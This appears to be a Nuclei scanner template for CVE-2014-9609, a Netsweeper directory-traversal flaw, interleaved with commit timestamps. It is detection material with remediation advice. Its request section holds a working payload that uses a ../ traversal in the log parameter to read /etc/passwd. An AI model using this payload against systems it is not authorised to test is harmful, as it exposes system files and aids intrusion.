2021-12-06 16:38:54 +00:00
id : CVE-2014-9609
info :
name : Netsweeper 4.0.8 - Directory Traversal
author : daffainfo
severity : medium
2022-02-25 22:07:55 +00:00
description : A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability.
2021-12-07 07:26:58 +00:00
reference :
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9609
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
2021-12-06 16:40:52 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-12-06 16:40:52 +00:00
cve-id : CVE-2014-9609
cwe-id : CWE-22
2023-08-31 11:46:18 +00:00
epss-score : 0.00212
epss-percentile : 0.5835
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : netsweeper
product : netsweeper
tags : cve2014,netsweeper,lfi,packetstorm,cve
2021-12-06 16:38:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-06 16:38:54 +00:00
- method : GET
path :
- "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-12-06 16:38:54 +00:00
- type : status
status :
2021-12-07 07:26:58 +00:00
- 200